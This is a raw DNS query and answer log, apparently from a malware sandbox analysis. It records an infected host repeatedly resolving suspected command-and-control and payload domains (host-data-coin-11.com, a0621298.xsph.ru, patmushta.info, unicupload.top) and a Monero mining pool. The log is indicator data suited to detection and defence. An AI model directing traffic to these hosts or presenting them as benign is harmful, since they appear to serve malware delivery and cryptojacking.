                                                                                                                                                                                                            Jan 13, 2022 23:29:49.907294035 CET192.168.2.68.8.8.80xe70fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.363436937 CET192.168.2.68.8.8.80x6d8eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.523484945 CET192.168.2.68.8.8.80x9540Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.684974909 CET192.168.2.68.8.8.80xb436Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.852371931 CET192.168.2.68.8.8.80xfc3Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.346960068 CET192.168.2.68.8.8.80x61ceStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.549402952 CET192.168.2.68.8.8.80x2c1aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.737508059 CET192.168.2.68.8.8.80x708bStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.186666012 CET192.168.2.68.8.8.80x5d64Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.362607956 CET192.168.2.68.8.8.80xe9bcStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.553836107 CET192.168.2.68.8.8.80x2622Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.717216969 CET192.168.2.68.8.8.80x76e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.915946960 CET192.168.2.68.8.8.80x1d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.091353893 CET192.168.2.68.8.8.80xc4e7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.271456957 CET192.168.2.68.8.8.80x8162Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.255681038 CET192.168.2.68.8.8.80xe801Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.428649902 CET192.168.2.68.8.8.80x644fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.612395048 CET192.168.2.68.8.8.80x337dStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.153584003 CET192.168.2.68.8.8.80x1480Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.313498974 CET192.168.2.68.8.8.80x12c4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.470238924 CET192.168.2.68.8.8.80x792fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.633542061 CET192.168.2.68.8.8.80xb05bStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.855351925 CET192.168.2.68.8.8.80x1c03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.050093889 CET192.168.2.68.8.8.80x7dd8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.216840982 CET192.168.2.68.8.8.80xe947Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.382360935 CET192.168.2.68.8.8.80x1d12Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:10.574676037 CET192.168.2.68.8.8.80xdd13Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:12.392607927 CET192.168.2.68.8.8.80x3462Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:14.302822113 CET192.168.2.68.8.8.80x69b2Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.189268112 CET192.168.2.68.8.8.80x5615Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.711497068 CET192.168.2.68.8.8.80x3ce5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.904176950 CET192.168.2.68.8.8.80x4628Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:16.051207066 CET192.168.2.68.8.8.80xeb08Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.567692995 CET192.168.2.68.8.8.80x1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.798347950 CET192.168.2.68.8.8.80x1113Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.158591032 CET192.168.2.68.8.8.80x64a3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.324814081 CET192.168.2.68.8.8.80x2406Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.491065025 CET192.168.2.68.8.8.80x35e3Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.573787928 CET192.168.2.68.8.8.80xc9d2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.883111954 CET192.168.2.68.8.8.80x4664Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:24.475070000 CET192.168.2.68.8.8.80xb01cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.396651030 CET192.168.2.68.8.8.80x53f7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:28.579149008 CET192.168.2.68.8.8.80x15fStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:39.841985941 CET192.168.2.68.8.8.80x9e17Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:42.829236984 CET192.168.2.68.8.8.80xb5ebStandard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.347338915 CET192.168.2.68.8.8.80x8366Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.445586920 CET192.168.2.68.8.8.80xd51bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.520307064 CET192.168.2.68.8.8.80xf56eStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.742400885 CET192.168.2.68.8.8.80xd2b2Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:51.994684935 CET192.168.2.68.8.8.80xba00Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.390553951 CET192.168.2.68.8.8.80x9ec1Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:31:18.783371925 CET192.168.2.68.8.8.80x2c4bStandard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                            Jan 13, 2022 23:29:09.697674036 CET8.8.8.8192.168.2.60xae58No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.131162882 CET8.8.8.8192.168.2.60xd607No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.563831091 CET8.8.8.8192.168.2.60xf5fcNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:10.727297068 CET8.8.8.8192.168.2.60x7b7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.180031061 CET8.8.8.8192.168.2.60xc752No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.364842892 CET8.8.8.8192.168.2.60x548No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.757402897 CET8.8.8.8192.168.2.60x9370No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.919792891 CET8.8.8.8192.168.2.60x3119No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.084080935 CET8.8.8.8192.168.2.60x1268No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.101315022 CET8.8.8.8192.168.2.60x3c85No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.262005091 CET8.8.8.8192.168.2.60x9861No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.424645901 CET8.8.8.8192.168.2.60x48b1No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.701661110 CET8.8.8.8192.168.2.60x5ab0No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:15.853955984 CET8.8.8.8192.168.2.60x8b66No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.283864021 CET8.8.8.8192.168.2.60x59b9No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.360713959 CET8.8.8.8192.168.2.60x1dbcNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.514317036 CET8.8.8.8192.168.2.60x81beNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.692796946 CET8.8.8.8192.168.2.60xe044No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:16.858153105 CET8.8.8.8192.168.2.60xa2d1No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:17.046593904 CET8.8.8.8192.168.2.60xfa97No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:20.704349041 CET8.8.8.8192.168.2.60x8f92No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:20.871716976 CET8.8.8.8192.168.2.60x5119No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:21.347768068 CET8.8.8.8192.168.2.60x5a1No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:21.516134977 CET8.8.8.8192.168.2.60x173No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:23.859105110 CET8.8.8.8192.168.2.60x2424No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.025132895 CET8.8.8.8192.168.2.60x632aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.487891912 CET8.8.8.8192.168.2.60x4aa9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.694325924 CET8.8.8.8192.168.2.60x80a3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.694325924 CET8.8.8.8192.168.2.60x80a3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.694325924 CET8.8.8.8192.168.2.60x80a3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.694325924 CET8.8.8.8192.168.2.60x80a3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:24.694325924 CET8.8.8.8192.168.2.60x80a3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.533840895 CET8.8.8.8192.168.2.60xf16No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.723767996 CET8.8.8.8192.168.2.60x805bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:26.886517048 CET8.8.8.8192.168.2.60x2c4aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.589410067 CET8.8.8.8192.168.2.60x21c0No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.589410067 CET8.8.8.8192.168.2.60x21c0No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.589410067 CET8.8.8.8192.168.2.60x21c0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.589410067 CET8.8.8.8192.168.2.60x21c0No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:41.589410067 CET8.8.8.8192.168.2.60x21c0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:44.278407097 CET8.8.8.8192.168.2.60xd574No error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.427587986 CET8.8.8.8192.168.2.60x5e27No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.619612932 CET8.8.8.8192.168.2.60x404fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.777292013 CET8.8.8.8192.168.2.60x34f7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:48.948421955 CET8.8.8.8192.168.2.60x7f29No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.110455036 CET8.8.8.8192.168.2.60x75No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.279872894 CET8.8.8.8192.168.2.60xb816No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.444879055 CET8.8.8.8192.168.2.60x8551No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.602030039 CET8.8.8.8192.168.2.60xcef6No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:49.769073963 CET8.8.8.8192.168.2.60x637fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.219671011 CET8.8.8.8192.168.2.60xe70fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.382039070 CET8.8.8.8192.168.2.60x6d8eNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.543113947 CET8.8.8.8192.168.2.60x9540No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.702033997 CET8.8.8.8192.168.2.60xb436No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.871994972 CET8.8.8.8192.168.2.60xfc3No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.366504908 CET8.8.8.8192.168.2.60x61ceNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.566884041 CET8.8.8.8192.168.2.60x2c1aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.761998892 CET8.8.8.8192.168.2.60x708bNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.761998892 CET8.8.8.8192.168.2.60x708bNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.206146002 CET8.8.8.8192.168.2.60x5d64No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.382162094 CET8.8.8.8192.168.2.60xe9bcNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.573051929 CET8.8.8.8192.168.2.60x2622No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.736783981 CET8.8.8.8192.168.2.60x76e9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.935136080 CET8.8.8.8192.168.2.60x1d4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.109098911 CET8.8.8.8192.168.2.60xc4e7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.288562059 CET8.8.8.8192.168.2.60x8162No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.275192022 CET8.8.8.8192.168.2.60xe801No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.447892904 CET8.8.8.8192.168.2.60x644fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.635010958 CET8.8.8.8192.168.2.60x337dNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.170701981 CET8.8.8.8192.168.2.60x1480No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.333105087 CET8.8.8.8192.168.2.60x12c4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.491004944 CET8.8.8.8192.168.2.60x792fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.651065111 CET8.8.8.8192.168.2.60xb05bNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.874785900 CET8.8.8.8192.168.2.60x1c03No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.069142103 CET8.8.8.8192.168.2.60x7dd8No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.235975027 CET8.8.8.8192.168.2.60xe947No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.401951075 CET8.8.8.8192.168.2.60x1d12No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:10.677889109 CET8.8.8.8192.168.2.60xdd13No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:12.421346903 CET8.8.8.8192.168.2.60x3462No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:14.320513964 CET8.8.8.8192.168.2.60x69b2No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.208156109 CET8.8.8.8192.168.2.60x5615No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.729043007 CET8.8.8.8192.168.2.60x3ce5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.923553944 CET8.8.8.8192.168.2.60x4628No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:16.341681957 CET8.8.8.8192.168.2.60xeb08No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.815614939 CET8.8.8.8192.168.2.60x1113No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.175718069 CET8.8.8.8192.168.2.60x64a3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.343470097 CET8.8.8.8192.168.2.60x2406No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.510390043 CET8.8.8.8192.168.2.60x35e3No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.593178988 CET8.8.8.8192.168.2.60xc9d2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.902317047 CET8.8.8.8192.168.2.60x4664No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:24.494168997 CET8.8.8.8192.168.2.60xb01cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:28.691292048 CET8.8.8.8192.168.2.60x15fNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:39.859559059 CET8.8.8.8192.168.2.60x9e17No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:42.850610971 CET8.8.8.8192.168.2.60xb5ebNo error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.375211000 CET8.8.8.8192.168.2.60x8366No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)s3-w.us-east-1.amazonaws.com54.231.194.41A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)s3-w.us-east-1.amazonaws.com52.217.203.217A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com94.23.23.52A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com94.23.247.226A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com37.187.95.110A (IP address)IN (0x0001)
